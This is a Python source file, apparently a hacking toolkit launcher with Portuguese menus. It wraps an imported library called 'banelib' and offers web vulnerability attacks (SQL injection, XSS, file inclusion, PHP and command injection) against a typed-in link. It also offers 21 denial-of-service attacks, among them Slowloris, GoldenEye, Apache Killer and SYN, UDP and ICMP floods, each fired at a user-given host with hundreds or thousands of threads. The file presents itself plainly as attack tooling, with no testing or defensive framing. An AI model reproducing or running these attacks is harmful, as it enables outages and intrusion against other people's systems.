import banelib
import os
def secpy():
	def clear():
		os.system('clear') or None
	clear()

	print(" =====================================")
	print("      ####  ######  ####  #####  #  # ")
	print("    #      #      #    # #    #  # #  ")
	print("     ####  #####  #      #    #   #   ")
	print("         # #      #      #####    #   ")
	print("    #    # #      #    # #        #   ")
	print("     ####  ######  ####  #        #   ")
	print(" =====================================")
	print("     scan  Vulnerabilities: [ 1]")
	print("     Dos/DDos:              [ 2]")
	print("     sair:                  [ 3]")
	pg1 = int(input("valor: "))
	if (pg1==1) :
#      Vulnerabilities TESTING
		clear()
		print(" =====================================")
		print("      ####  ######  ####  #####  #  # ")
		print("    #      #      #    # #    #  # #  ")
		print("     ####  #####  #      #    #   #   ")
		print("         # #      #      #####    #   ")
		print("    #    # #      #    # #        #   ")
		print("     ####  ######  ####  #        #   ")
		print(" =====================================")
		print("           Vulnerabilities  ")
		print("SQL-Injection: 1")
		print("XSS: 2")
		print("FI: 3")
		print("Injecao de codigo PHP: 4")
		print("Injecao de comandos: 5")
		print("volta: 6")
		print("sair: 7")
		valor2 =int(input("valor: "))
		if (valor2==1) :
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("          SQL-Injection ")
			link = input("link ")
			banelib.sqlieb(link)
		if (valor2==2) :
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("                 XSS")
			link = input("link ")
			banelib.xss(link)
		if (valor2==3) :
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("                 FI")
			link = input("link ")
			banelib.fi(link)
		if (valor2==4) :
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("         Injecao de codigo PHP")
			link = input("link ")
			banelib.getinject(link)
		if (valor2==5) :
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("         Injecao de comandos")
			link = input("link ")
			banelib.execlink(link)
		if (valor2==6) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			secpy()
		if (valor2==7) :
			print("saio")
#          Dos / DDos
	if (pg1==2) :
		clear()
		print(" =====================================")
		print("      ####  ######  ####  #####  #  # ")
		print("    #      #      #    # #    #  # #  ")
		print("     ####  #####  #      #    #   #   ")
		print("         # #      #      #####    #   ")
		print("    #    # #      #    # #        #   ")
		print("     ####  ######  ####  #        #   ")
		print(" =====================================")
		print("             Dos/DDos ")
		print("________________________________________")
		print("Hulk ataque:                        [ 1]")
		print("________________________________________")
		print("Hulk ataque com proxies http:       [ 2]")
		print("________________________________________")
		print("Slowloris ataque:                   [ 3]")
		print("________________________________________")
		print("Xerxes ataque:                      [ 4]")
		print("________________________________________")
		print("Http flood:                         [ 5]")
		print("________________________________________")
		print("Http inundacao com proxies:         [ 6]")
		print("________________________________________")
		print("Tcp flood:                          [ 7]")
		print("________________________________________")
		print("Udp flood:                          [ 8]")
		print("________________________________________")
		print("Doser:                              [ 9]")
		print("________________________________________")
		print("Prox doser:                         [10]")
		print("________________________________________")
		print("Torshammer:                         [11]")
		print("________________________________________")
		print("Slow read:                          [12]")
		print("________________________________________")
		print("Apache killer:                      [13]")
		print("________________________________________")
		print("Gold eneye:                         [14]")
		print("________________________________________")
		print("Medusa:                             [15]")
		print("________________________________________")
		print("Icmp:                               [16]")
		print("________________________________________")
		print("Syn flood:                          [17]")
		print("________________________________________")
		print("Icmp storm:                         [18]")
		print("________________________________________")
		print("Land:                               [19]")
		print("________________________________________")
		print("Udp storm:                          [20]")
		print("________________________________________")
		print("Black nurse:                        [21]")
		print("________________________________________")
		print("voltar:                             [22]")
		print("________________________________________")
		print("sair:                               [23]")
		print("________________________________________")
		valor2 =int(input("        valor: "))
		if (valor2==1) :
			#hulk ataque
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("           Hulk ataque")
			link = input("Host ip ")
			banelib.hulk (link, threads = 1000) 
		if (valor2==2) :
			#hulk ataque com proxies http
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("    Hulk ataque com proxies http")
			link = input("Host ip ")
			banelib.proxhulk (link, threads = 1000) 
		if (valor2==3) :
			#slowloris ataque
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("           Slowloris ataque")
			link = input("Host ip ")
			banelib.slowloris (link, p = 80, threads = 50) 
		if (valor2==4) :
			#xerxes ataque
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("             Xerxes")
			link = input("Host ip ")
			banelib.xerxes (link, p = 443, threads = 500) 
		if (valor2==5) :
			#http flood
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("             Httpflood")
			link = input("Host ip ")
			banelib.httpflood (link, p = 80, threads = 1000) 
		if (valor2==6) : 
			#http flood with proxies
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("             Lulzer")
			link = input("Host ip ")
			banelib.lulzer(link,p=80,threads=1000) 
		if (valor2==7) : 
			#tcp flood
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("             Tcpflood")
			link = input("Host ip ")
			banelib.tcpflood(link,threads=1000)
		if (valor2==8) : 
			#udp flood
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("                 Udp")
			link = input("Host ip ")
			banelib.udp(link,p=80) 
		if (valor2==9) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("                 Doser")
			link = input("Host ip ")
			banelib.doser(link,threads=500)
		if (valor2==10) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("               Proxdoser")
			link = input("Host ip ")
			banelib.proxdoser(link,threads=500)
		if (valor2==11) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Torshammer")
			link = input("Host ip ")
			banelib.torshammer(link,p=80,threads=1000)
		if (valor2==12) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Slowread")
			link = input("Host ip ")
			banelib.slowread(link,p=80,threads=1000)
		if (valor2==13) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Apache Killer")
			link = input("Host ip ")
			banelib.apachekiller(link,p=80,threads=500)
		if (valor2==14) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              goldeneye")
			link = input("Host ip ")
			banelib.goldeneye(link,p=80,threads=1000)
		if (valor2==15) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("                Medusa")
			link = input("Host ip ")
			banelib.medusa(link,p=80,threads=1000)
		if (valor2==16) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("                Icmp")
			link = input("Host ip ")
			banelib.icmp(link,p=80,threads=100)
		if (valor2==17) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Syn flood")
			link = input("Host ip ")
			banelib.synflood(link,p=80,threads=100)
		if (valor2==18) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Icmp storm")
			link = input("Host ip ")
			baneliblink = raw_input("Host ip ")
			banelib.icmpstorm(link,p=80,threads=100)
		if (valor2==19) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Land")
			link = input("Host ip ")
			banelib.land(link,p=80,threads=100)
		if (valor2==20) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("              Udp storm")
			link = input("Host ip ")
			banelib.udpstorm(link,p=80,threads=100)
		if (valor2==21) : 
			clear()
			print(" =====================================")
			print("      ####  ######  ####  #####  #  # ")
			print("    #      #      #    # #    #  # #  ")
			print("     ####  #####  #      #    #   #   ")
			print("         # #      #      #####    #   ")
			print("    #    # #      #    # #        #   ")
			print("     ####  ######  ####  #        #   ")
			print(" =====================================")
			print("             Black nurse")
			link = input("Host ip ")
			banelib.blacknurse(link,p=80,threads=100)
		if (valor2==22) :
			secpy()
		if (valor2==23) :
			print("saio")
	if (pg1==3) :
		print("saio")
secpy()
	
	
         